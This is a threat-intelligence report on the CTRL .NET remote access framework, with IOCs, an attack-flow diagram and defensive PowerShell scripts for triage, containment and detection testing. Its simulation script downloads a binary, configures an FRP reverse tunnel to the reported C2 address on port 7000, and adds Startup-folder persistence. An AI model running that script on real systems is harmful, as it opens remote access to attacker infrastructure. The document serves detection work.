SOC Prime Bias: Critical

31 Mar 2026 17:07

Under CTRL: Dissecting a Previously Undocumented Russian .Net Access Framework

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Censys ARC uncovered a previously undocumented Russian remote access toolkit named CTRL that blends credential phishing, keylogging, RDP hijacking, and FRP-based reverse tunnels. The framework is delivered through a malicious LNK file and hides its binaries inside the Windows registry, where they are later loaded directly into memory. Its network infrastructure includes the domain hui228.ru and two IP addresses operating an FRP server on port 7000. The toolkit targets Windows hosts and maintains persistence through scheduled tasks, hidden local user accounts, and registry-based changes.

Investigation

Researchers identified the LNK dropper, rebuilt the layered PowerShell loader, and traced staged .NET binaries stored as REG_BINARY values beneath Explorer registry keys. The stager then downloads follow-on payloads, creates a concealed ctrl.exe loader, configures FRP tunnels, and deploys RDP Wrapper to allow unrestricted remote sessions. None of the observed artifacts appeared in public threat intelligence feeds, suggesting the framework is a private and purpose-built access platform.

Mitigation

Defenders should watch for unusual registry writes under Explorer keys, creation of scheduled tasks named DriverSvcTask, NetTcpSvc, TermSvcHost, or WindowsHealthMonitor, and hidden local accounts added to the Administrators or Remote Desktop Users groups. Outbound connections to the identified IP addresses and FRP port 7000 should be blocked, and FRP protocol traffic on unexpected systems should be flagged. Unauthorized FRP or RDP Wrapper installations should be removed, and PowerShell execution should be tightly controlled.
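The checks from the Investigation and Mitigation paragraphs, as one host-triage script. This is an added example, not SOC Prime's or Censys's code: the task names, group names, ctrl.exe, C:\Temp\keylog.txt and TCP/7000 are taken from the report; the Explorer key roots searched, the 64-byte minimum for a registry PE blob and the IOC list (only the IP this page names) are assumptions of the script.

```powershell
# Added example (not SOC Prime's or Censys's code): one-shot host triage for the
# CTRL artifacts described in the Investigation and Mitigation sections. Run in
# an elevated Windows PowerShell 5.1 session. The task names, group names,
# ctrl.exe, C:\Temp\keylog.txt and TCP/7000 come from the report; the Explorer
# roots searched, the 64-byte minimum for a PE blob and the IOC list (only the
# IP this page names) are assumptions of this script.

$Findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Category, [string]$Detail) {
    $Findings.Add([pscustomobject]@{ Category = $Category; Detail = $Detail })
}

# 1. REG_BINARY values under Explorer keys that contain a PE image:
#    'MZ' at offset 0 and 'PE\0\0' at the offset stored in e_lfanew (0x3C).
$explorerRoots = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer'
)
foreach ($root in $explorerRoots) {
    if (-not (Test-Path $root)) { continue }
    $keys = @(Get-Item $root) + @(Get-ChildItem $root -Recurse -ErrorAction SilentlyContinue)
    foreach ($key in $keys) {
        foreach ($name in $key.GetValueNames()) {
            if ($key.GetValueKind($name) -ne 'Binary') { continue }
            [byte[]]$b = $key.GetValue($name)
            if ($b.Length -lt 64 -or $b[0] -ne 0x4D -or $b[1] -ne 0x5A) { continue }
            $pe = [BitConverter]::ToInt32($b, 0x3C)
            if ($pe -gt 0 -and ($pe + 4) -le $b.Length -and
                $b[$pe] -eq 0x50 -and $b[$pe + 1] -eq 0x45 -and
                $b[$pe + 2] -eq 0 -and $b[$pe + 3] -eq 0) {
                Add-Finding 'RegistryPE' "$($key.Name)\$name ($($b.Length) bytes)"
            }
        }
    }
}

# 2. The four scheduled task names reported for CTRL persistence.
$taskNames = 'DriverSvcTask', 'NetTcpSvc', 'TermSvcHost', 'WindowsHealthMonitor'
Get-ScheduledTask -ErrorAction SilentlyContinue |
    Where-Object { $taskNames -contains $_.TaskName } | ForEach-Object {
        $acts = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        Add-Finding 'ScheduledTask' "$($_.TaskPath)$($_.TaskName) -> $acts"
    }

# 3. Members of the two groups the report names that are hidden from the logon
#    screen (UserList value 0) or from 'net user' output (trailing '$').
$userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
$meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
$hidden = @()
if (Test-Path $userList) {
    $hidden = @((Get-ItemProperty $userList).PSObject.Properties |
        Where-Object { $_.Name -notin $meta -and $_.Value -eq 0 } | ForEach-Object { $_.Name })
}
foreach ($group in 'Administrators', 'Remote Desktop Users') {
    Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue |
        Where-Object { $_.ObjectClass -eq 'User' } | ForEach-Object {
            $short = $_.Name.Split('\')[-1]
            $why = @()
            if ($hidden -contains $short) { $why += 'UserList=0' }
            if ($short.EndsWith('$')) { $why += 'trailing $' }
            if ($why.Count) { Add-Finding 'HiddenAccount' "$($_.Name) in $group ($($why -join ', '))" }
        }
}

# 4. RDP Wrapper redirects TermService from termsrv.dll to rdpwrap.dll.
$params = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService\Parameters' -ErrorAction SilentlyContinue
if ($params.ServiceDll -and $params.ServiceDll -notmatch 'termsrv\.dll$') {
    Add-Finding 'RDPWrapper' "TermService ServiceDll = $($params.ServiceDll)"
}
if (Test-Path "$env:ProgramFiles\RDP Wrapper\rdpwrap.dll") {
    Add-Finding 'RDPWrapper' "$env:ProgramFiles\RDP Wrapper\rdpwrap.dll present"
}

# 5. Live evidence: ctrl.exe, the keylog file, and TCP sessions to the FRP port or IOC IP.
$iocIps = @('194.33.61.36')   # the report names two IPs; only this one appears on this page
Get-Process -Name ctrl -ErrorAction SilentlyContinue |
    ForEach-Object { Add-Finding 'Process' "ctrl.exe PID $($_.Id) $($_.Path)" }
if (Test-Path 'C:\Temp\keylog.txt') { Add-Finding 'Keylog' 'C:\Temp\keylog.txt present' }
Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
    Where-Object { $_.RemotePort -eq 7000 -or $iocIps -contains $_.RemoteAddress } | ForEach-Object {
        $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        Add-Finding 'FRPConnection' "$($p.ProcessName) (PID $($_.OwningProcess)) -> $($_.RemoteAddress):$($_.RemotePort)"
    }

if ($Findings.Count) { $Findings | Format-Table -AutoSize } else { 'No CTRL indicators found on this host.' }
```

The PE check reads the e_lfanew pointer rather than just looking for "MZ", because small binary values (icon caches, thumbnail data) under Explorer keys frequently begin with arbitrary bytes; requiring the "PE\0\0" signature at the pointed-to offset keeps the noise down. A hit in section 1 is worth carving out and scanning, since the report describes exactly this storage pattern.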

Response

If CTRL-related activity is found, isolate the endpoint, acquire the LNK file and relevant registry hive for forensic analysis, stop the ctrl.exe process, and remove the associated scheduled tasks. Any newly created local accounts should be disabled, unauthorized RDP permissions revoked, and exposed credentials rotated. Teams should then scan the wider environment for additional FRP servers and update detection rules with the observed IOCs.
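The response steps above as a runbook script. This is an added example, not SOC Prime's or Censys's code, and it deliberately collects evidence before it stops or deletes anything. The evidence directory, the firewall rule names, the C2 IP used for the block rule (the one named on this page) and the account list you pass in are assumptions of the script; the task names and ctrl.exe come from the report.

```powershell
# Added example (not SOC Prime's or Censys's code): containment for a host where
# CTRL artifacts were confirmed. Run elevated; -WhatIf previews every change.
# Evidence (LNK, Explorer hive, task XML, process and connection snapshot) is
# collected first. The evidence path, firewall rule names, the C2 IP (the one
# this page names) and the accounts you pass are assumptions of this script.
[CmdletBinding(SupportsShouldProcess)]
param(
    [string]$EvidenceDir = "C:\IR\${env:COMPUTERNAME}-$(Get-Date -Format 'yyyyMMdd-HHmmss')",
    [string[]]$SuspectAccount = @(),   # hidden local accounts identified during triage
    [string]$LnkPath = ''              # the recovered LNK dropper, if known
)
$taskNames = 'DriverSvcTask', 'NetTcpSvc', 'TermSvcHost', 'WindowsHealthMonitor'
$c2Ip = '194.33.61.36'

# 1. Preserve evidence before anything is changed.
New-Item -ItemType Directory -Path $EvidenceDir -Force | Out-Null
if ($LnkPath -and (Test-Path $LnkPath)) {
    Copy-Item $LnkPath $EvidenceDir
    Get-FileHash $LnkPath -Algorithm SHA256 | Export-Csv "$EvidenceDir\lnk_hash.csv" -NoTypeInformation
}
# reg.exe save writes a loadable hive copy of the key the stager is stored under.
& reg.exe save 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer' "$EvidenceDir\hkcu_explorer.hiv" /y | Out-Null
foreach ($t in $taskNames) {
    $task = Get-ScheduledTask -TaskName $t -ErrorAction SilentlyContinue
    if ($task) { Export-ScheduledTask -TaskName $t -TaskPath $task.TaskPath | Set-Content "$EvidenceDir\task_$t.xml" }
}
Get-CimInstance Win32_Process -Filter "Name = 'ctrl.exe'" |
    Select-Object ProcessId, ParentProcessId, ExecutablePath, CommandLine, CreationDate |
    Export-Csv "$EvidenceDir\ctrl_process.csv" -NoTypeInformation
Get-NetTCPConnection | Export-Csv "$EvidenceDir\tcp_connections.csv" -NoTypeInformation
Get-LocalUser | Export-Csv "$EvidenceDir\local_users.csv" -NoTypeInformation

# 2. Cut the known C2 path locally. Full network isolation should still be done
#    from the EDR; these rules only cover the infrastructure named in the report.
if ($PSCmdlet.ShouldProcess("outbound $c2Ip and TCP/7000", 'Add block rules')) {
    New-NetFirewallRule -DisplayName 'IR-CTRL-Block-C2' -Direction Outbound -Action Block -RemoteAddress $c2Ip | Out-Null
    New-NetFirewallRule -DisplayName 'IR-CTRL-Block-FRP' -Direction Outbound -Action Block -Protocol TCP -RemotePort 7000 | Out-Null
}

# 3. Stop the loader and remove its scheduled-task persistence.
Get-Process -Name ctrl -ErrorAction SilentlyContinue | ForEach-Object {
    if ($PSCmdlet.ShouldProcess("ctrl.exe PID $($_.Id)", 'Stop')) { Stop-Process -Id $_.Id -Force }
}
foreach ($t in $taskNames) {
    if ((Get-ScheduledTask -TaskName $t -ErrorAction SilentlyContinue) -and
        $PSCmdlet.ShouldProcess("scheduled task $t", 'Unregister')) {
        Unregister-ScheduledTask -TaskName $t -Confirm:$false
    }
}

# 4. Disable the hidden accounts and revoke their RDP and admin group membership.
foreach ($a in $SuspectAccount) {
    if ($PSCmdlet.ShouldProcess("local account $a", 'Disable and remove from groups')) {
        Disable-LocalUser -Name $a -ErrorAction SilentlyContinue
        foreach ($g in 'Administrators', 'Remote Desktop Users') {
            Remove-LocalGroupMember -Group $g -Member $a -ErrorAction SilentlyContinue
        }
    }
}
Write-Host "Evidence written to $EvidenceDir. Rotate credentials used on this host and hunt for FRP elsewhere."
```

Run it once with -WhatIf to see what would be stopped, unregistered and disabled; the evidence collection in step 1 runs regardless, which is the intended order. The credential rotation and the wider FRP hunt from the paragraph above are not automated here because they happen outside the affected host.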

Attack Flow

    graph TB
    %% Class Definitions Section
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef process fill:#ffeb99
    classDef file fill:#dddddd

    %% Nodes – Actions (MITRE Techniques)
    action_user_exec["<b>Action</b> – <b>T1204.002 User Execution</b>: Victim clicks malicious .lnk shortcut"]
    class action_user_exec action
    action_lnk_smuggle["<b>Action</b> – <b>T1027.012 LNK Icon Smuggling</b>: Shortcut disguises itself with a folder icon"]
    class action_lnk_smuggle action
    action_powershell["<b>Action</b> – <b>T1059.001 PowerShell</b>: Hidden PowerShell command decodes payload"]
    class action_powershell action
    action_deobfuscate["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files</b>: Multiple Base64 and Deflate stages"]
    class action_deobfuscate action
    action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b>: Randomized variable names and runtime string construction"]
    class action_obfuscation action
    action_shortcut_persistence["<b>Action</b> – <b>T1547.009 Shortcut Modification</b>: LNK serves as persistence mechanism"]
    class action_shortcut_persistence action
    action_scheduled_tasks["<b>Action</b> – <b>T1053 Scheduled Task/Job</b>: Four tasks created to run binaries at startup"]
    class action_scheduled_tasks action
    action_create_account["<b>Action</b> – <b>T1136.001 Create Account</b>: Hidden local administrator account added"]
    class action_create_account action
    action_uac_bypass["<b>Action</b> – <b>T1548 Abuse Elevation Control Mechanism</b>: fodhelper.exe registry hijack bypasses UAC"]
    class action_uac_bypass action
    action_proxy_execution["<b>Action</b> – <b>T1218 System Binary Proxy Execution</b>: wlrmdr.exe used to execute payload with elevated rights"]
    class action_proxy_execution action
    action_priv_esc["<b>Action</b> – <b>T1068 Exploitation for Privilege Escalation</b>: patches termsrv.dll and installs RDP Wrapper"]
    class action_priv_esc action
    action_masquerade["<b>Action</b> – <b>T1036 Masquerading</b>: Files placed in hidden directories with legitimate-looking names"]
    class action_masquerade action
    action_hide_artifacts["<b>Action</b> – <b>T1564 Hide Artifacts</b>: Defender exclusions, timestamp falsification, registry mimicry"]
    class action_hide_artifacts action
    action_keylogging["<b>Action</b> – <b>T1056.001 Input Capture – Keylogging</b>: Low-level keyboard hook writes to C:\Temp\keylog.txt"]
    class action_keylogging action
    action_cred_harvest["<b>Action</b> – Credential Harvesting: Custom WPF Windows Hello UI captures PINs"]
    class action_cred_harvest action
    action_rdp["<b>Action</b> – <b>T1021.001 Remote Services – RDP</b>: RDP Wrapper enables remote desktop access"]
    class action_rdp action
    action_rdp_hijack["<b>Action</b> – <b>T1563.002 Remote Service Session Hijacking</b>: Attacker shadows active sessions via mstsc /shadow"]
    class action_rdp_hijack action
    action_frp_proxy["<b>Action</b> – <b>T1090.002 Proxy – External Proxy</b>: FRP tunnel to hui228.ru:7000 acts as external proxy"]
    class action_frp_proxy action
    action_encrypted_channel["<b>Action</b> – <b>T1573 Encrypted Channel</b>: FRP traffic encrypted, AES-256-CBC payload decryption"]
    class action_encrypted_channel action
    action_valid_accounts["<b>Action</b> – <b>T1078.003 Valid Accounts – Local Accounts</b>: Hidden admin account used for persistence and lateral movement"]
    class action_valid_accounts action
    action_lateral_movement["<b>Action</b> – Lateral Movement: Use of valid local admin accounts to spread within the network"]
    class action_lateral_movement action

    %% Nodes – Tools / Files / Processes
    tool_lnk["<b>Tool</b> – Weaponized .lnk Shortcut<br/><b>File</b>: kfxm7p9q_yek.lnk"]
    class tool_lnk tool
    tool_powershell["<b>Tool</b> – PowerShell<br/><b>Purpose</b>: Execute hidden script that decodes and decompresses .NET stager"]
    class tool_powershell tool
    process_stager["<b>Process</b> – .NET Stager stored as REG_BINARY under HKCU\…\Explorer"]
    class process_stager process
    tool_fodhelper["<b>Tool</b> – fodhelper.exe (Windows Utility)"]
    class tool_fodhelper tool
    tool_wlrmdr["<b>Tool</b> – wlrmdr.exe (signed Microsoft binary)"]
    class tool_wlrmdr tool
    tool_rdpwrapper["<b>Tool</b> – RDP Wrapper<br/><b>Function</b>: Enables unlimited concurrent RDP sessions"]
    class tool_rdpwrapper tool
    tool_frp["<b>Tool</b> – FRP client<br/><b>Function</b>: Reverse tunnel to external server"]
    class tool_frp tool
    keylog_file["<b>File</b> – C:\Temp\keylog.txt<br/><b>Content</b>: Captured keystrokes"]
    class keylog_file file

    %% Connections – Attack Flow
    action_user_exec -->|launches| tool_lnk
    tool_lnk -->|triggers| action_lnk_smuggle
    action_lnk_smuggle -->|leads to| action_powershell
    action_powershell -->|executes| tool_powershell
    tool_powershell -->|stores payload in| process_stager
    process_stager -->|decoded by| action_deobfuscate
    action_deobfuscate -->|enables| action_obfuscation
    action_obfuscation -->|supports| action_shortcut_persistence
    action_shortcut_persistence -->|creates| action_scheduled_tasks
    action_scheduled_tasks -->|creates| action_create_account
    action_create_account -->|facilitates| action_uac_bypass
    action_uac_bypass -->|uses| tool_fodhelper
    action_uac_bypass -->|uses| tool_wlrmdr
    action_uac_bypass -->|enables| action_proxy_execution
    action_proxy_execution -->|facilitates| action_priv_esc
    action_priv_esc -->|installs| tool_rdpwrapper
    action_priv_esc -->|enables| action_masquerade
    action_masquerade -->|leads to| action_hide_artifacts
    action_hide_artifacts -->|adds| action_keylogging
    action_keylogging -->|writes to| keylog_file
    action_keylogging -->|supports| action_cred_harvest
    action_cred_harvest -->|enables| action_rdp
    action_rdp -->|used for| action_rdp_hijack
    action_rdp_hijack -->|sets up| action_frp_proxy
    action_frp_proxy -->|provides| action_encrypted_channel
    action_encrypted_channel -->|allows| action_valid_accounts
    action_valid_accounts -->|used for| action_lateral_movement

    %% Styling Assignments
    class tool_lnk,tool_powershell,tool_fodhelper,tool_wlrmdr,tool_rdpwrapper,tool_frp tool
    class process_stager process
    class keylog_file file

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:
    An adversary has already dropped the FRP client (frp.exe) onto the compromised Windows host via a malicious phishing attachment. To maintain persistence, the attacker registers a shortcut in the Startup folder that launches FRP with a configuration pointing to the C2 server 194.33.61.36:7000. When the user logs on, the shortcut starts FRP, which opens a reverse TCP tunnel back to the attacker; any local service named in the configuration (e.g., SMB) is then reachable through the attacker's FRP server. The network connection generated by FRP matches the rule's dst_ip and dst_port criteria, causing an alert.

  • Regression Test Script: (PowerShell – self‑contained)

    # =============================================================================
    # FRP Reverse Tunnel Simulation – triggers Sigma rule fcb13968-1490-44c2-9f9f-c1ad2b668ce6
    # =============================================================================
    # Variables
    $frpUrl      = "https://example.com/frp.exe"          # replace with a reachable test binary
    $frpPath     = "$env:ProgramData\frp.exe"             # upstream ships the client as frpc.exe; frp.exe is the name this simulation uses
    $cfgPath     = "$env:ProgramData\frp_client.ini"
    $c2Ip        = "194.33.61.36"
    $c2Port      = "7000"
    $startupLnk  = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\FRP.lnk"

    # 1. Download FRP binary (simulated – use any small executable for test)
    Invoke-WebRequest -Uri $frpUrl -OutFile $frpPath -UseBasicParsing

    # 2. Create minimal FRP client config (legacy INI keys; newer FRP releases also accept TOML).
    #    Built from an array of lines rather than a here-string so the block still runs when
    #    pasted indented (a here-string terminator must start at column 0).
    $cfgLines = @(
        "[common]",
        "server_addr = $c2Ip",
        "server_port = $c2Port",
        "",
        "[ssh]",
        "type = tcp",
        "local_port = 22",
        "remote_port = 6000"
    )
    $cfgLines | Set-Content -Path $cfgPath -Encoding ASCII

    # 3. Create a shortcut in the Startup folder to run FRP on logon
    $ws = New-Object -ComObject WScript.Shell
    $shortcut = $ws.CreateShortcut($startupLnk)
    $shortcut.TargetPath = $frpPath
    $shortcut.Arguments  = "-c `"$cfgPath`""
    $shortcut.WorkingDirectory = Split-Path $frpPath
    $shortcut.Save()

    # 4. Launch FRP now (so we can see the telemetry immediately)
    Start-Process -FilePath $frpPath -ArgumentList "-c `"$cfgPath`"" -WindowStyle Hidden

    Write-Host "FRP reverse tunnel launched. Check SIEM for detection."
  • Cleanup Commands:

    # Stop FRP process
    Get-Process -Name frp -ErrorAction SilentlyContinue | Stop-Process -Force

    # Remove files and shortcut
    Remove-Item -Path "$env:ProgramData\frp.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:ProgramData\frp_client.ini" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\FRP.lnk" -Force -ErrorAction SilentlyContinue

    Write-Host "Cleanup completed."
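The dst_ip/dst_port match the attack narrative describes, reproduced offline over constructed Sysmon Event ID 3 records so the logic can be checked without running the simulation. This is an added example and not the Sigma rule itself or SOC Prime's code: the sample events, the allow-list parameter and the lower-severity "TCP/7000 from an unapproved image" check are assumptions of the example; only the IP, the port and the frp.exe name come from the page.

```powershell
# Added example (not the Sigma rule or SOC Prime's code): the dst_ip/dst_port match
# from the narrative above, run over constructed Sysmon Event ID 3 records.
# The sample events, the approved-image list and the medium-severity port-only
# check are assumptions; only 194.33.61.36, port 7000 and frp.exe come from the page.

function ConvertFrom-SysmonNetworkEvent {
    # Flattens the <EventData> of a Sysmon network-connection event (ID 3) into an object.
    param([Parameter(Mandatory)][string]$Xml)
    $doc = [xml]$Xml
    if ([string]$doc.Event.System.EventID -ne '3') { return $null }
    $f = @{}
    foreach ($d in $doc.Event.EventData.Data) { $f[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Image           = $f['Image']
        DestinationIp   = $f['DestinationIp']
        DestinationPort = [int]$f['DestinationPort']
        Initiated       = ($f['Initiated'] -eq 'true')
    }
}

function Test-CtrlFrpIndicator {
    # Critical: outbound connection to a known CTRL FRP server on its port (the
    # narrative's dst_ip AND dst_port condition). Medium: any outbound TCP/7000
    # from an image that is not on the allow list, per the Mitigation guidance.
    param(
        [Parameter(Mandatory)]$Record,
        [string[]]$IocAddresses = @('194.33.61.36'),
        [int]$FrpPort = 7000,
        [string[]]$ApprovedFrpImages = @()   # sanctioned frpc deployments, if any (assumption)
    )
    if (-not $Record.Initiated) { return $null }   # inbound connections are out of scope
    $dest = "$($Record.DestinationIp):$($Record.DestinationPort)"
    if ($Record.DestinationPort -eq $FrpPort -and $IocAddresses -contains $Record.DestinationIp) {
        return [pscustomobject]@{ Severity = 'critical'; Reason = 'known CTRL FRP server'; Image = $Record.Image; Dest = $dest }
    }
    if ($Record.DestinationPort -eq $FrpPort -and $ApprovedFrpImages -notcontains $Record.Image) {
        return [pscustomobject]@{ Severity = 'medium'; Reason = 'FRP default port from unapproved image'; Image = $Record.Image; Dest = $dest }
    }
    return $null
}

function New-SampleSysmonEvent([string]$Image, [string]$Ip, [int]$Port, [bool]$Initiated) {
    # Constructed Sysmon-style XML for testing; not real telemetry.
    @"
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>3</EventID></System>
  <EventData>
    <Data Name="Image">$Image</Data>
    <Data Name="Protocol">tcp</Data>
    <Data Name="Initiated">$($Initiated.ToString().ToLower())</Data>
    <Data Name="DestinationIp">$Ip</Data>
    <Data Name="DestinationPort">$Port</Data>
  </EventData>
</Event>
"@
}

# Four constructed records: the simulation's connection, an internal TCP/7000 from
# an unexpected image, ordinary browser traffic (RFC 5737 test address), and an
# inbound connection that the rule should ignore.
$samples = @(
    (New-SampleSysmonEvent 'C:\ProgramData\frp.exe' '194.33.61.36' 7000 $true),
    (New-SampleSysmonEvent 'C:\Windows\System32\svchost.exe' '10.0.0.5' 7000 $true),
    (New-SampleSysmonEvent 'C:\Program Files\Browser\browser.exe' '203.0.113.10' 443 $true),
    (New-SampleSysmonEvent 'C:\ProgramData\frp.exe' '194.33.61.36' 7000 $false)
)
$samples | ForEach-Object { ConvertFrom-SysmonNetworkEvent $_ } |
    ForEach-Object { Test-CtrlFrpIndicator $_ } | Where-Object { $_ } | Format-Table -AutoSize
```

Only the first two records produce findings: the frp.exe connection is critical because both the address and the port match, and the svchost.exe connection is medium because nothing on the host is expected to speak to TCP/7000. The inbound record is dropped by the Initiated check, which is the detail most worth keeping when porting this to a SIEM query; without it, the FRP server side of a sanctioned deployment would fire the same alert.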